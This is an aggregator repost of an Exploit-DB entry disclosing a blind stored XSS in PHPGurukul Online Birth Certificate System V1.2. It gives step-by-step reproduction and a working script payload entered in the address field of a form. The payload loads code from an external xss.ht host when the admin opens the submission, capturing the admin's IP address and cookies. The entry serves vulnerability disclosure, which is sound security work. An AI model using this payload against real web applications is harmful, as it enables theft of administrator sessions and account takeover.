3
[webapps] PHPGurukul Online Birth Certificate System V 1.2 - Blind XSS
source link: https://www.exploit-db.com/exploits/51061
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
PHPGurukul Online Birth Certificate System V 1.2 - Blind XSS
EDB-ID:
51061
EDB Verified:
Exploit Title: PHPGurukul Online Birth Certificate System V 1.2 - Blind XSS
# Date: 2022-10-02
# Exploit Author: Prasheek Kamble
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/online-birth-certificate-system-using-php-and-mysql/
# Version: V 1.2
# Vulnerable endpoint: http://localhost/Birth%20Certificate%20System/obcs/user/fill-birthregform.php
# Tested on MAC OS, XAMPP
Steps to reproduce:
1) Navigate to http://localhost/Birth%20Certificate%20System/obcs/user/fill-birthregform.php
2) Fill the form and Enter xss payload "><script src=https://prasheekk05.xss.ht></script> in address field
3) Click on Add Details and intercept the request in Burpsuite
4) After this, the details have been submitted.
5) As soon as admin(Victim) receives our request, when he clicks on it to verify our form, the XSS payload gets fired.
6) Now attacker get's the details of victim like ip address, cookies of Victim, etc
7) So attacker is sucessful in getting the victim's ip address and other details.
#POC's
https://ibb.co/kSxFp2g
https://ibb.co/VvSVRsy
https://ibb.co/mSGp4FX
https://ibb.co/hXbJ9TZ
https://ibb.co/M6vS08S
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK